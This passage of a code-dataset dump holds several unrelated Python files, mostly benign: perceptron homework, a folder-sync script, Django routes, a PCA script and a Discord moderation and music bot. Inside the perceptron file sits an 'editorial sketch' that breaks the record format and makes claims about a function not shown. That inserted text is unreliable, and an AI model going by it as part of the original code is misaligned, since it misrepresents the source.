target[i]:\n            count += 1\n    count = float(count)\n    return count/len(target)\n\n\n# %% np.array for confusion matrix\ndef conf_matrix(pred_list, target):\n    target = list(target)\n    matrix = np.zeros((26, 26))\n    for i in range(len(target)):\n        matrix[ord(target[i])-ord('A')][ord(pred_list[i])-ord('A')] += 1\n    list_map = ['A', 'B', 'C', 'D', 'E', 'F', 'G',\n                'H', 'I', 'J', 'K', 'L', 'M', 'N',\n                'O', 'P', 'Q', 'R', 'S', 'T', 'U',\n                'V', 'W', 'X', 'Y', 'Z']\n    matrix = pd.DataFrame(matrix, index=list_map, columns=list_map)\n    return matrix\n
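For reference, here is a much shorter voting routine (an editorial sketch, not the original code). Unlike pick_winner above, it breaks ties uniformly at random; the sequential coin flips in pick_winner do not produce a uniform choice among tied letters.

import random
from collections import Counter

def pick_winner_counter(predict_list):
    # tally the 325 pairwise votes and return a most-common letter,
    # drawing uniformly at random among tied winners
    counts = Counter(predict_list)
    best = max(counts.values())
    return random.choice([c for c, n in counts.items() if n == best])

# %% Running the program. 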
Takes a couple minutes\nnetwork = build_network(per_names, eta, train)\npred_list = predict(network, test)\ntar_series = test['target']\nacc = predict_accuracy(pred_list, tar_series)\nconfusion = conf_matrix(pred_list, test['target'])\nconfusion.to_clipboard()\n", "repo_name": "kramer102/MachineLearning2016", "sub_path": "1-layer-perceptron/Robert_Kramer_hw1.py", "file_name": "Robert_Kramer_hw1.py", "file_ext": "py", "file_size_in_byte": 9118, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 89, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 162, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 163, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 234, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 275, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 284, "usage_type": "call"}]} +{"seq_id": "6425259545", "text": "#\n# [K4toLL] Maintain folder structure in LucidLink volume based on layouts in K4\n#\n# K4toLL: 1.0\n#\n# Changelog:\n#\t\t- 1.0 (12th September 2022):\n#\t\t\t- First version\n#\n# Author: Marco Baldassarre \n#\n\nimport json\nimport os\nimport sys\n\nimport pymssql # on Windows, open a cmd and run: py -m pip install pymssql\n\n# import _scproxy # workaround for _iconv error on Mac OS X -- see https://github.com/pymssql/pymssql/issues/705\n\nfrom _configuration import *\n\n# persistence of K4 layouts on local file\ndirs_json_path = os.path.join(os.path.dirname(__file__), 'dirs.json')\nif os.path.isfile(dirs_json_path):\n with open(dirs_json_path, 'r') as f:\n layouts_last_known_directory = json.load(f)\nelse:\n layouts_last_known_directory = {} # empty dict\n\n# loop through all K4 databases configured\nfor mssql_db in mssql_dbs:\n # connect to DB server\n k4db = pymssql._mssql.connect(server=mssql_db['host'],\n user=mssql_username,\n password=mssql_password,\n database=mssql_db['database'])\n\n # fetch rows from table\n k4db.execute_query('''\n\t\tSELECT\n\t\t\tPublication.name as title,\n\t\t\tIssue.name as issueName,\n\t\t\tIssue.idx as issueNumber,\n\t\t\tpublicationDate,\n\t\t\tSection.name as section,\n\t\t\tK4ObjectVariant.id as layoutId,\n\t\t\tK4Object.Name as layoutName\n\t\t\t\t\t\t\n\t\tFROM \n\t\t\tK4Object \n\t\t\tINNER JOIN K4ObjectVariant ON K4Object.id = K4ObjectVariant.K4ObjectID\n\t\t\tINNER JOIN Issue ON K4ObjectVariant.issueID = Issue.id\n\t\t\t\t\t\t\tAND K4ObjectVariant.publicationID = Issue.PublicationID\n\t\t\tINNER JOIN Publication ON Issue.PublicationID = Publication.id\n\t\t\tINNER JOIN Section ON K4ObjectVariant.sectionID = Section.id\n\t\t\n\t\tWHERE \n\t\t\tK4Object.K4ObjectType = 0 AND\n\t\t\t(Issue.type=0 OR Issue.type=4) AND\n\t\t\tPublication.active=1 
AND\n\t\t\tpublicationDate IS NOT NULL AND \n\t\t\tpublicationDate > CAST(DATEDIFF(s, '1970-01-01 00:00:00', ''' + minimum_publication_date + ''') AS BIGINT)*1000''')\n # K4Object.K4ObjectType = 0 : Layouts only\n\n for k4layout in k4db:\n market_brand_level = publication_name_mapping.get(k4layout['title'])\n if market_brand_level is None:\n print(k4layout['title'], 'not in the mapping dictionary, skipping...', file=sys.stderr)\n continue\n\n year = k4layout['issueName'][0:4]\n layout_id = str(k4layout['layoutId'])\n\n layout_directory = os.path.join(market_brand_level, year, k4layout['issueName'], k4layout['layoutName'])\n layout_last_known_directory = layouts_last_known_directory.get(layout_id)\n\n if layout_last_known_directory is None:\n # new layout, let's create its folders\n\n # create the same structure within Editorial and Repro\n for root_level in ['Editorial', 'Repro']:\n os.makedirs(os.path.join(lucidlink_root, root_level, layout_directory), exist_ok=True)\n\n elif layout_last_known_directory != layout_directory:\n # layout directory needs moving!\n\n # create the same structure within Editorial and Repro\n for root_level in ['Editorial', 'Repro']:\n try:\n os.rename(\n src=os.path.join(lucidlink_root, root_level, layout_last_known_directory),\n dst=os.path.join(lucidlink_root, root_level, layout_directory)\n )\n except FileExistsError:\n # If dst exists, do nothing. It may already have been renamed manually.\n pass\n else:\n # do nothing, as nothing has changed\n pass\n\n # maintain the local dictionary updated\n layouts_last_known_directory[layout_id] = layout_directory\n\n# persistence of K4 layouts on local file\nwith open(dirs_json_path, 'w') as f:\n json.dump(layouts_last_known_directory, f)\n", "repo_name": "mbaldassarre/K4toLL", "sub_path": "K4toLL.py", "file_name": "K4toLL.py", "file_ext": "py", "file_size_in_byte": 3902, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 27, "usage_type": "call"}, {"api_name": "pymssql._mssql.connect", "line_number": 34, "usage_type": "call"}, {"api_name": "pymssql._mssql", "line_number": 34, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.rename", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 107, "usage_type": "call"}]} +{"seq_id": "40906088608", "text": "from django.urls import path\nfrom django.urls import include\n\nfrom 
rest_auth.registration import views as registration_views\nfrom rest_auth import views as auth_views\n\nfrom . import views\n\nurlpatterns = [\n\n # User\n path('/', include([\n path(\n 'follow/',\n views.FollowViewSet.as_view({\n 'post': 'create',\n 'get': 'list'\n }),\n name='follow'\n ),\n path('unfollow/', views.FollowViewSet.as_view({'delete': 'destroy'}), name='unfollow'),\n path('', views.UserViewSet.as_view({'get': 'retrieve'}), name='profile'),\n ])),\n\n path('me/', views.UserViewSet.as_view({'get': 'retrieve_me'}), name='profile'),\n\n # Login\n path('login/', auth_views.LoginView.as_view(), name='login'),\n\n # Registration\n path('', registration_views.RegisterView.as_view(), name='registration'),\n\n]\n", "repo_name": "hwshim0810/restapi-example-Django", "sub_path": "apps/users/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "rest_auth.views.LoginView.as_view", "line_number": 28, "usage_type": "call"}, {"api_name": "rest_auth.views.LoginView", "line_number": 28, "usage_type": "attribute"}, {"api_name": "rest_auth.views", "line_number": 28, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_auth.registration.views.RegisterView.as_view", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_auth.registration.views.RegisterView", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rest_auth.registration.views", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "39342999364", "text": "# x를 4차원에서 2차원으로 변형, Dense 모델에 넣어주기\n# keras 56_mnist_DNN.py 복붙\n\nimport numpy as np\n\n\n#1. 
데이터\nfrom tensorflow.keras.datasets import mnist\n\nmnist.load_data()\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\nprint(x_train.shape) # (60000, 28, 28)\nprint(x_test.shape) # (10000, )\nprint(y_train.shape) # (60000, )\nprint(y_test.shape) # (10000, )\n\n\n# x_data전처리 : MinMaxScaler\nx_train = x_train.astype('float32')/255\nx_test = x_test.astype('float32')/255\n\n\n# # y_data 전처리 : one_hot_encoding (다중 분류)\n# from keras.utils.np_utils import to_categorical\n# y_trian = to_categorical(y_train)\n# y_test = to_categorical(y_test)\n# print(y_train.shape)\n\n\n# reshape : Dense형 모델 사용을 위한 '2차원'\nx_train = x_train.reshape(60000, 784 ).astype('float32')/255 \nx_test = x_test.reshape(10000, 784).astype('float32')/255 \n\nprint(x_train.shape) # (60000, 784)\nprint(x_test.shape) # (10000, 784)\n\n\nX = np.append(x_train, x_test, axis = 0)\n\nprint(X.shape) # (70000, 784)\n\nfrom sklearn.decomposition import PCA\n\npca = PCA()\npca.fit(X)\n\ncumsum = np.cumsum(pca.explained_variance_ratio_)\n\nprint(cumsum)\n\n# best_n_components = np.argmax(cumsum >= 0.99) +1 # 331\nbest_n_components = np.argmax(cumsum >= 0.95) +1 # 154\n\nprint(best_n_components) \n\n\n", "repo_name": "elf0508/Study-bit", "sub_path": "AE/a04_pca_mnist.py", "file_name": "a04_pca_mnist.py", "file_ext": "py", "file_size_in_byte": 1493, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "tensorflow.keras.datasets.mnist.load_data", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.keras.datasets.mnist", "line_number": 10, "usage_type": "name"}, {"api_name": "tensorflow.keras.datasets.mnist.load_data", "line_number": 12, "usage_type": "call"}, {"api_name": "tensorflow.keras.datasets.mnist", "line_number": 12, "usage_type": "name"}, {"api_name": "numpy.append", "line_number": 40, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.cumsum", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "11970040968", "text": "import asyncio\nimport nacl\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nimport discord\nimport youtube_dl\nfrom discord.ext import commands\nimport os\n\nbot = commands.Bot(command_prefix=commands.when_mentioned_or(\"!\"))\nnext_music = []\nban = {}\nflag = True\n\n@bot.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(bot))\n\n@bot.event\nasync def on_message(message):\n global ban, flag\n list = ['бля', 'блять', 'сука', 'нахуй', \"на хуй\", \"пизда\", \"ебал\", \"ебать\", \"на xуй\", \"на хyй\", \"на xyй\", \"нa хуй\",\n \"нa xуй\", \"нa хyй\", \"нa xyй\", 'cука', 'сyка', 'сукa', 'cyка', 'cукa', 'cyкa', 'сyкa', \"бздун\", 'бзднуть',\n 'бздюх','блудилище','выпердеть','высраться','выссаться','говно','говенка','говноед','говномес','говночист',\n 'говяга','говнюк','говняный','говна пирога','глиномес','изговнять','гнида','гнидас','гнидазавр',\n 'гниданидзе','гондон','гондольер','даун','даунитто','дерьмо','дерьмодемон','дерьмище','дрисня','дрист',\n 'дристануть','обдристаться','дерьмак','дристун','дрочить','дрочила','суходрочер','дебил','дебилоид',\n 'дрочка','драчун','задрот','дцпшник','елда','елдаклык','елдище','жопа','жопошник','залупа','залупиться',\n 'залупинец','засеря','засранец','засрать','защеканец','изговнять','идиот','изосрать','курва','кретин',\n 
'кретиноид','курвырь','лезбуха','лох','минетчица','мокрощелка','мудак','мудень','мудила','мудозвон',\n 'мудацкая','мудасраная дерьмопроелдина','мусор','педрик','пердеж','пердение','пердельник','пердун',\n 'пидор','пидорасина','пидорормитна','пидорюга','педерастер','педобратва','дружки педигрипал','писька',\n 'писюн','спидозный пес','ссаная псина','спидораковый','срать','спермер','спермобак','спермодун','срака',\n 'сракаборец','сракалюб','срун','сучара','сучище','титьки','трипер','хер','херня','херовина','хероед',\n 'охереть','пошел на хер','хитрожопый','хрен моржовый','шлюха','шлюшидзе']\n\n if message.author == bot.user:\n return\n\n if flag == True:\n for i in list:\n if i in message.content.lower() and message.author not in ban:\n await message.delete()\n ban[message.author] = 1\n await message.channel.send(f'❌ Ай ай ай {message.author}! А здесь материться нельзя! Это пока {ban[message.author]} случай. На третий раз ЗАБАНЮ!')\n break\n\n if i in message.content.lower() and ban[message.author] < 2:\n await message.delete()\n ban[message.author] += 1\n await message.channel.send(f'❌ Ай ай ай {message.author}! А здесь материться нельзя! Это пока {ban[message.author]} случай. На третий раз ЗАБАНЮ!')\n break\n\n if i in message.content.lower() and ban[message.author] == 2:\n await message.delete()\n await message.author.ban(reason='Нецензурное выражение.')\n await message.channel.send(f'БАН {message.author}! Причина: нецензурное выражение.')\n del ban[message.author]\n break\n\n if flag == False:\n pass\n\n await bot.process_commands(message)\n\n@bot.command()\nasync def status(ctx):\n global ban\n if ctx.message.author not in ban:\n await ctx.send('У вас нет предупреждений. Вы очень галантный и вежливый пользователь. Продолжайте в том-же духе! ☺')\n else:\n await ctx.send(f'{ctx.message.author}, у вас на счету {ban[ctx.message.author]} предупреждения. 
Будет 3 и вас забанят, так что будьте аккуратны в выражениях.')\n\n@bot.command()\nasync def clear(ctx, limit=None):\n if limit == None and ctx.message.author.guild_permissions.manage_messages == True:\n await ctx.channel.purge()\n\n if limit != None and ctx.message.author.guild_permissions.manage_messages == True:\n await ctx.channel.purge(limit=int(limit)+1)\n\n if ctx.message.author.guild_permissions.manage_messages == False:\n await ctx.send('❌ У вас нет такого права.')\n\n@bot.command()\nasync def pause(ctx: commands.Context):\n ctx.voice_client.pause()\n await ctx.send('⏹ Для того чтобы продолжить напишите !resume')\n\n@bot.command()\nasync def resume(ctx: commands.Context):\n ctx.voice_client.resume()\n await ctx.send('⏯ Для того чтобы поставить на паузу напишите !pause')\n\n@bot.command()\nasync def stop(ctx: commands.Context):\n global next_music\n next_music.clear()\n await ctx.voice_client.disconnect()\n\n@bot.command()\nasync def list(ctx):\n global next_music\n if len(next_music) == 0:\n await ctx.send('❌ Сейчас список музыки пуст.')\n for i in range(0, len(next_music)):\n await ctx.send(f'{i+1} - {next_music[i]}')\n\n@bot.command()\nasync def add(ctx, *, name_music):\n global next_music\n headers = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36\"\n }\n\n req = requests.get(f\"https://www.youtube.com/results?search_query={name_music}\", headers=headers)\n soup = BeautifulSoup(req.text, \"html.parser\")\n n = re.search(r'\"videoId\":\"(\\w+)\"', str(soup.find('body').find_all('script')[13].text)).group()[11:-1]\n next_music.append(f'https://www.youtube.com/watch?v={n}')\n await ctx.send('✅ Музыка успешно добавлена.')\n\n@bot.command()\nasync def skip(ctx):\n global next_music\n\n if len(next_music) == 0:\n await ctx.send('❌ Сейчас в списке нет следующих компазиций.')\n\n else:\n if not ctx.author.voice or not ctx.author.voice.channel:\n await ctx.send('❌ Сначала подключись к голосовому.')\n else:\n try:\n await ctx.voice_client.disconnect()\n except:\n pass\n await ctx.send('⏭')\n await ctx.message.author.voice.channel.connect(reconnect=True)\n video = next_music.pop(0)\n YDL_OPTIONS = {'format': 'bestaudio', 'noplaylist': 'True'}\n FFMPEG_OPTIONS = {'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5',\n 'options': '-vn'}\n voice = discord.utils.get(bot.voice_clients, guild=ctx.guild)\n print(voice)\n with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:\n info = ydl.extract_info(video, download=False)\n URL = info['formats'][0]['url']\n try:\n os.chdir(r'ffmpeg\\bin')\n except:\n pass\n voice.play(discord.player.FFmpegPCMAudio(executable=fr\"{os.getcwd()}\\ffmpeg.exe\", source=URL,\n **FFMPEG_OPTIONS))\n voice.is_playing()\n await ctx.send(f\"✅ Сейчас играет: {video}\")\n\n@bot.command()\nasync def play(ctx, *, name_song):\n headers = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36\"\n }\n\n req = requests.get(f\"https://www.youtube.com/results?search_query={name_song}\", headers=headers)\n soup = BeautifulSoup(req.text, \"html.parser\")\n n = 
re.search(r'\"videoId\":\"(\\w+)\"', str(soup.find('body').find_all('script')[13].text)).group()[11:-1]\n video = f'https://www.youtube.com/watch?v={n}'\n try:\n if not ctx.author.voice or not ctx.author.voice.channel:\n await ctx.send('❌ Сначала подключись к голосовому.')\n\n else:\n await ctx.message.author.voice.channel.connect(reconnect=True)\n YDL_OPTIONS = {'format': 'bestaudio', 'noplaylist': 'True'}\n FFMPEG_OPTIONS = {'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5', 'options': '-vn'}\n voice = discord.utils.get(bot.voice_clients, guild=ctx.guild)\n print(voice)\n with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:\n info = ydl.extract_info(video, download=False)\n URL = info['formats'][0]['url']\n try:\n os.chdir(r'ffmpeg\\bin')\n except:\n pass\n voice.play(discord.player.FFmpegPCMAudio(executable=fr\"{os.getcwd()}\\ffmpeg.exe\", source=URL, **FFMPEG_OPTIONS))\n voice.is_playing()\n await ctx.send(f\"✅ Сейчас играет: {video}\")\n except discord.errors.ClientException:\n await ctx.send(\"❌ Музыка уже играет. Если хотите добавить в очередь, напишите - !add 'название музыки'\")\n\n@bot.command()\nasync def antimat(ctx):\n global flag, ban\n count = 0\n\n if flag == False and ctx.message.author.guild_permissions.administrator == True and count == 0:\n flag = True\n count += 1\n await ctx.send(f'Пользователь {ctx.message.author} ВКЛЮЧИЛ контроль за сквернословн��ми. Теперь чат под строгим надзором!')\n\n if flag == True and ctx.message.author.guild_permissions.administrator == True and count == 0:\n flag = False\n ban = {}\n count += 1\n await ctx.send(f'Пользователь {ctx.message.author} ОТКЛЮЧИЛ контроль за сквернословными. Теперь в чатах можно материться.')\n\n if ctx.message.author.guild_permissions.administrator == False:\n await ctx.send('❌ У вас нет такого права.')\n\n@bot.command()\nasync def menu(ctx):\n await ctx.send(\"☺ Привет! Я test-bot. Вот список моих команд:\\n\"\n \"> • !clear <число (необязательно)> - отчистка всего чата или нескольких сообщений. ⚠ Только АДМИНИСТРАТОРАМ и МОДЕРАТОРАМ сервера!\\n\"\n \"> • !play <название музыки> - включает музыку с YouTube.\\n\"\n \"> • !antimat - ОТКЛЮЧАЕТ или ВКЛЮЧАЕТ контроль за нецензурные выражения. 
⚠ Только АДМИНИСТРАТОРАМ сервера!\\n\"\n \"> • !pause - ставит музыку на паузу.\\n\"\n \"> • !resume - воспраизводит музыку с момента паузы.\\n\"\n \"> • !stop - останавливает музыку.\\n\"\n \"> • !add - добавить музыку в очередь.\\n\"\n \"> • !skip - пропустить текущую музыку.\\n\"\n \"> • !list - показывает список следующих копазиций.\")\n\nbot.run('Your token')", "repo_name": "Rikitick/Bot-DISCORD", "sub_path": "Bot_DISCORD/main_bot/bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 12529, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "discord.ext.commands.Bot", "line_number": 11, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 11, "usage_type": "name"}, {"api_name": "discord.ext.commands.when_mentioned_or", "line_number": 11, "usage_type": "call"}, {"api_name": "discord.ext.commands.Context", "line_number": 87, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 87, "usage_type": "name"}, {"api_name": "discord.ext.commands.Context", "line_number": 92, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 92, "usage_type": "name"}, {"api_name": "discord.ext.commands.Context", "line_number": 97, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 97, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 118, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 119, "usage_type": "call"}, {"api_name": "re.search", "line_number": 120, "usage_type": "call"}, {"api_name": "discord.utils.get", "line_number": 145, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 145, "usage_type": "attribute"}, {"api_name": "youtube_dl.YoutubeDL", "line_number": 147, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 151, "usage_type": "call"}, {"api_name": "discord.player.FFmpegPCMAudio", "line_number": 154, "usage_type": "call"}, {"api_name": "discord.player", "line_number": 154, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 154, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 166, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 167, "usage_type": "call"}, {"api_name": "re.search", "line_number": 168, "usage_type": "call"}, {"api_name": "discord.utils.get", "line_number": 178, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 178, "usage_type": "attribute"}, {"api_name": "youtube_dl.YoutubeDL", "line_number": 180, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 184, "usage_type": "call"}, {"api_name": "discord.player.FFmpegPCMAudio", "line_number": 187, "usage_type": "call"}, {"api_name": "discord.player", "line_number": 187, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 187, "usage_type": "call"}, {"api_name": "discord.errors", "line_number": 190, "usage_type": "attribute"}]} +{"seq_id": "31237841164", "text": "from pyvirtualdisplay import Display\nfrom selenium import webdriver\n\ndisplay = Display(visible=0, size=(800, 600))\ndisplay.start()\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('--no-sandbox')\n\ndriver = webdriver.Chrome(chrome_options=options)\ndriver.get('http://nytimes.com')\nprint(driver.title)\n\n\n\n\n\n\n\n\n\n# from selenium import webdriver\n# driver = webdriver.Firefox(executable_path='/usr/bin/geckodriver')\n# driver.get(\"http://google.com\")\n# driver.implicitly_wait(15)\n# 
driver.get_screenshot_as_file(\"c10.png\")\n", "repo_name": "saurabh9567/aadhaar", "sub_path": "test3.py", "file_name": "test3.py", "file_ext": "py", "file_size_in_byte": 526, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pyvirtualdisplay.Display", "line_number": 4, "usage_type": "call"}, {"api_name": "selenium.webdriver.ChromeOptions", "line_number": 7, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 7, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "15634445132", "text": "from django.shortcuts import render\nfrom .models import kontenmentee\n# Create your views here.\n\n\ndef mentee(request):\n dbmentee = kontenmentee.objects.all()\n data = {\n 'halamanhome': '/',\n 'halamanblog': '/blog',\n 'halamanmentor': '/mentor',\n 'halamanmentee': '/mentee',\n 'halamanauthor': '/author',\n 'kontenmentees' : dbmentee\n }\n return render(request, 'mentee.html', data)\n", "repo_name": "faviansya/DJANGO_MVC", "sub_path": "project_advance_views/mentee/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 430, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "models.kontenmentee.objects.all", "line_number": 7, "usage_type": "call"}, {"api_name": "models.kontenmentee.objects", "line_number": 7, "usage_type": "attribute"}, {"api_name": "models.kontenmentee", "line_number": 7, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "72325368764", "text": "from factory.rotated_factory import RotatedEllipsoidFactory\nfrom factory.dixon_factory import DixonFactory\nfrom controllers.ag import Ag\n\nMAX_INDIVIDUALS = 40\nELITE = 8\nGENERATIONS = 2000\n\nag = Ag()\n\nprint(\"ROTATED HYPER-ELLIPSOID FUNCTION\")\nag.execute( nGen=GENERATIONS,\n nInd=MAX_INDIVIDUALS,\n elitism=ELITE,\n maximization=False,\n interval=(-65.536, 65.536),\n dimension=2,\n factory=RotatedEllipsoidFactory.factory )\n\nprint(\"DIXON-PRICE FUNCTION\")\nag.execute( nGen=GENERATIONS,\n nInd=MAX_INDIVIDUALS,\n elitism=ELITE,\n maximization=False,\n interval=(-10, 10),\n dimension=2,\n factory=DixonFactory.factory )\n\n\n\n\n\n\n\n\n", "repo_name": "arthurzatta/genetic-algorithms", "sub_path": "surjano/src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 746, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "controllers.ag.Ag", "line_number": 9, "usage_type": "call"}, {"api_name": "factory.rotated_factory.RotatedEllipsoidFactory.factory", "line_number": 18, "usage_type": "attribute"}, {"api_name": "factory.rotated_factory.RotatedEllipsoidFactory", "line_number": 18, "usage_type": "name"}, {"api_name": "factory.dixon_factory.DixonFactory.factory", "line_number": 27, "usage_type": "attribute"}, {"api_name": "factory.dixon_factory.DixonFactory", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "5763907004", "text": "import datetime\nfrom google.appengine.ext import ndb\n\nclass User(ndb.Model):\n\tname = ndb.StringProperty(required=True)\n\tfb_id = ndb.StringProperty(required=True)\n\timg_url = ndb.StringProperty(required=True)\n\nclass Selection(ndb.Model):\n\tname = ndb.StringProperty()\n\tpeople = 
ndb.StructuredProperty(User, repeated=True)\n\nclass Poll(ndb.Model): \n\tname = ndb.StringProperty()\n\tselections = ndb.LocalStructuredProperty(Selection, repeated=True)\n\nclass Event(ndb.Model):\n\tname = ndb.StringProperty(required=True)\n\thost_name = ndb.StringProperty(required=True)\n\thost_fb_id = ndb.StringProperty(required=True)\n\tdescription = ndb.StringProperty()\n\tpicture_url = ndb.StringProperty()\n\tpeople = ndb.StructuredProperty(User, repeated=True)\n\tpolls = ndb.LocalStructuredProperty(Poll, repeated=True)\n\ndef addEvent(event):\n\tevent = Event(\n\t\tname = event[\"name\"],\n\t\thost_name = event[\"host_name\"],\n\t\thost_fb_id = event[\"host_fb_id\"],\n\t\tdescription = event[\"description\"],\n\t\tpicture_url = event[\"picture_url\"],\n\t\tpeople = [User(name = event[\"people\"][0][\"name\"],\n\t\t\t\t\t fb_id = event[\"people\"][0][\"id\"],\n\t\t\t\t\t img_url = event[\"people\"][0][\"img_url\"])],\n\t\tpolls = [Poll(name = \"datetime\", selections = []),\n\t\t\t\t Poll(name = 'location', selections = [])]\n\t);\n\n\tkey = event.put()\n\tkey_string = key.urlsafe()\n\n\treturn key_string\n\ndef editEvent(event, url_key):\n\told_event = ndb.Key(urlsafe=url_key)\n\told_event = old_event.get()\n\n\n\told_event.name = event[\"name\"]\n\told_event.host_name = event[\"host_name\"]\n\told_event.host_fb_id = event[\"host_fb_id\"]\n\told_event.description = event[\"description\"]\n\told_event.picture_url = event[\"picture_url\"]\n\told_event.people = []\n\n\tfor person in event[\"people\"]:\n\t\told_event.people.append(User(name = person[\"name\"],\n\t\t\t\t\t \t\t \t fb_id = person[\"id\"],\n\t\t\t\t\t \t\t \t img_url = person[\"img_url\"]))\n\n\tkey = old_event.put();\n\treturn old_event\n\t\n\ndef getEvent(url_key):\n\tevent = ndb.Key(urlsafe=url_key)\n\treturn event.get()\n\ndef addUser(user, url_key):\n\tevent = ndb.Key(urlsafe=url_key)\n\tevent = event.get()\n\tevent.people.append(User(name = user[\"name\"],\n\t\t\t\t\t\t\t fb_id = 